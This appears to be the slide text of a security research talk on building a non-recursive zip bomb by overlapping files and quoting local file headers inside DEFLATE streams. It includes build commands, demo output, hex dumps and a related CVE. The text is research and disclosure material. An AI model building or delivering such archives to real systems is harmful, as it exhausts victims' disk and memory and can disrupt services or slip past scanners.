A better zip bomb

David Fifield <david@bamsoftware.com>

https://www.bamsoftware.com/hacks/zipbomb/ (writeup)

https://www.bamsoftware.com/hacks/denhac-zipbomb/ (this talk)

Source code / short demo

source code link

$ git clone https://www.bamsoftware.com/git/zipbomb.git
$ cd zipbomb
$ make
$ sha256sum zbsm.zip zblg.zip zbxl.zip
fb4ff972d21189beec11e05109c4354d0cd6d3b629263d6c950cf8cc3f78bd99  zbsm.zip
f1dc920869794df3e258f42f9b99157104cd3f8c14394c1b9d043d6fcda14c0a  zblg.zip
eafd8f574ea7fd0f345eaa19eae8d0d78d5323c8154592c850a2d78a86817744  zbxl.zip
$ wc --bytes zbsm.zip zblg.zip zbxl.zip
   42374 zbsm.zip
 9893525 zblg.zip
45876952 zbxl.zip
$ unzip -l zblg.zip | tail -n 1
281395456244934                     65534 files
$ ./ratio zblg.zip
zblg.zip	281395456244934 / 9893525	28442385.9286689	+74.54 dB
$ time unzip -p zblg.zip | dd bs=32M of=/dev/null status=progress
...

Haven't I heard this before?

Screenshot of https://www.unforgettable.dk/.

Limits of the DEFLATE compression algorithm

The only universally supported compression algorithm is DEFLATE (RFC 1951).

But DEFLATE's maximum compression ratio is 1032.

$ dd if=/dev/zero bs=1000000 count=1000 | gzip > test.gz
$ gzip -l test.gz
         compressed        uncompressed  ratio uncompressed_name
             970501          1000000000  99.9% test
$ echo '1000000000 / 970501' | bc -l
1030.39564101428025318881

42.zip tries to work around the DEFLATE limitation by recursively nesting zip files inside other zip files.

Screenshot of xarchiver 0.5.4.14 open to the top layer of 42.zip.
Screenshot of xarchiver 0.5.4.14 open to the bottom layer of 42.zip.

Goal: high compression ratio without using recursion.

Zip format

A block diagram of the structure of a zip file. The central directory header consists of three central directory headers labeled CDH[1] (README), CDH[1] (Makefile), and CDH[3] (demo.c). The central directory headers point backwards to three local file headers LFH[1] (README), LFH[2] (Makefile), and LFH[3] (demo.c). Each local file header is joined with file data. The three joined blocks of (local file header, file data) are labeled file 1, file 2, and file 3.

A zip file consists of a central directory, which is like a table of contents that points backwards to individual files.

Each file consists of a local file header and compressed file data.

The headers in the central directory and in the files contain (redundant) metadata such as the filename.

The zip file format specification is called APPNOTE.TXT. For a specification, it's not very precise. If you read it with a security mindset, you will quickly think of many troubling questions.

Trick #1: overlapping files

A block diagram of a zip file with fully overlapping files. The central directory header consists of central directory headers CDH[1], CDH[2], ..., CDH[N−1], CDH[N], with filenames A, B, ..., Y, Z. There is a single local file header LFH[1] with filename A whose file data is a compressed kernel. Every one of the central directory headers points backwards to the same local file header, LFH[1]. The lone file is multiply labeled file 1, file 2, ..., file N−1, file N.

Compress one kernel of ratio 1032:1, refer to it many times.

Unfortunately this doesn't quite work, because filenames don't match.

(See overlap.zip, generated by the source code.)

Trick #2: quoting headers

A block diagram of a zip file with quoted local file headers. The central directory header consists of central directory headers CDH[1], CDH[2], ..., CDH[N−1], CDH[N], with filenames A, B, ..., Y, Z. The central directory headers point to corresponding local file headers LFH[1], LFH[2], ..., LFH[N−1], LFH[N] with filenames A, B, ..., Y, Z. The files are drawn and labeled to show that file 1 does not end before file 2 begins; rather file 1 contains file 2, file 2 contains file 3, and so on. There is a small green-colored space between LFH[1] and LFH[2], and between LFH[2] and LFH[3], etc., to stand for quoting the following local file header using an uncompressed DEFLATE block. The file data of the final file, whose local file header is LFH[N] and whose filename is Z, does not contain any other files, only the compressed kernel.

We need separate local file headers, but we cannot just put them end to end, because the decompressor is expecting a structured DEFLATE stream, not another local file header.

We need a way to protect or quote the local file headers to prevent them from being interpreted as DEFLATE data.

Solution: add a prefix that wraps the local file header in a non-compressed literal block, thus making it a valid part of the DEFLATE stream.

3.2.3. Details of block format

Each block of compressed data begins with 3 header bits
containing the following data:

   first bit       BFINAL
   next 2 bits     BTYPE

BFINAL is set if and only if this is the last block of the data
set.

BTYPE specifies how the data are compressed, as follows:

   00 - no compression
   01 - compressed with fixed Huffman codes
   10 - compressed with dynamic Huffman codes
   11 - reserved (error)
3.2.4. Non-compressed blocks (BTYPE=00)

Any bits of input up to the next byte boundary are ignored.
The rest of the block consists of the following information:

     0   1   2   3   4...
   +---+---+---+---+================================+
   |  LEN  | NLEN  |... LEN bytes of literal data...|
   +---+---+---+---+================================+

LEN is the number of data bytes in the block.  NLEN is the
one's complement of LEN.

Quoting demonstrated

$ ./zipbomb --alphabet=ABCDE --num-files=5 --compressed-size=50 > test.zip
$ unzip -l test.zip
Archive:  test.zip
  Length      Date    Time    Name
---------  ---------- -----   ----
    36245  1982-10-08 13:37   A
    36214  1982-10-08 13:37   B
    36183  1982-10-08 13:37   C
    36152  1982-10-08 13:37   D
    36121  1982-10-08 13:37   E
---------                     -------
   180915                     5 files
A B C D E
BFINAL=0 BTYPE=00 31 bytes "PK\x03\x04\x14\x00..."
BFINAL=0 BTYPE=00 31 bytes "PK\x03\x04\x14\x00..."
BFINAL=0 BTYPE=00 31 bytes "PK\x03\x04\x14\x00..."
BFINAL=0 BTYPE=00 31 bytes "PK\x03\x04\x14\x00..."
BFINAL=1 BTYPE=10 compressed kernel 36121 × 'a'
BFINAL=0 BTYPE=00 31 bytes "PK\x03\x04\x14\x00..."
BFINAL=0 BTYPE=00 31 bytes "PK\x03\x04\x14\x00..."
BFINAL=0 BTYPE=00 31 bytes "PK\x03\x04\x14\x00..."
BFINAL=1 BTYPE=10 compressed kernel 36121 × 'a'
BFINAL=0 BTYPE=00 31 bytes "PK\x03\x04\x14\x00..."
BFINAL=0 BTYPE=00 31 bytes "PK\x03\x04\x14\x00..."
BFINAL=1 BTYPE=10 compressed kernel 36121 × 'a'
BFINAL=0 BTYPE=00 31 bytes "PK\x03\x04\x14\x00..."
BFINAL=1 BTYPE=10 compressed kernel 36121 × 'a'
BFINAL=1 BTYPE=10 compressed kernel 36121 × 'a'

Local file headers are treated as both code and data: both as part of the zip structure (code) and as part of a DEFLATE stream (file data).

$ unzip test.zip
Archive:  test.zip
  inflating: A
  inflating: B
  inflating: C
  inflating: D
  inflating: E
$ xxd E | head -n 5
00000000: 6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
00000010: 6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
00000020: 6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
00000030: 6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
00000040: 6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
$ xxd D | head -n 5
00000000: 504b 0304 1400 0000 0800 a06c 4805 a1b7  PK.........lH...
00000010: f363 3200 0000 198d 0000 0100 0000 4561  .c2...........Ea
00000020: 6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
00000030: 6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
00000040: 6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
$ xxd C | head -n 5
00000000: 504b 0304 1400 0000 0800 a06c 4805 29b0  PK.........lH.).
00000010: 790b 5600 0000 388d 0000 0100 0000 4450  y.V...8.......DP
00000020: 4b03 0414 0000 0008 00a0 6c48 05a1 b7f3  K.........lH....
00000030: 6332 0000 0019 8d00 0001 0000 0045 6161  c2...........Eaa
00000040: 6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa

Discussion topics

In order of increasing technicality.

Optimization

Log–log plot of unzipped size versus zipped size for different zip file constructions: DEFLATE, bzip2, quoted DEFLATE, and 42.zip (recursive and non-recursive).

Effects

CVE-2019-13232

Info-ZIP UnZip 6.0 mishandles the overlapping of files inside a ZIP container, leading to denial of service (resource consumption), aka a "better zip bomb" issue.

IMO this is not really a security problem with UnZip.

Debian merged a patch; SUSE decided not to. The Debian patch caused unanticipated problems with certain zip-like files:

Effects (antivirus)

VirusTotal for:

Selected web server referers:

Effects

Screenshot of a twitter "unsafe link" page referring to the zip bomb article.
Screenshot of https://www.bamsoftware.com/ showing a Safe Browsing interstitial.

Other ideas?

PDF is similar structurally to zip. Didier Stevens wrote about stacking compression filters to create a PDF bomb.

David Fifield <david@bamsoftware.com>

https://www.bamsoftware.com/hacks/zipbomb/ (writeup)

https://www.bamsoftware.com/hacks/denhac-zipbomb/ (this talk)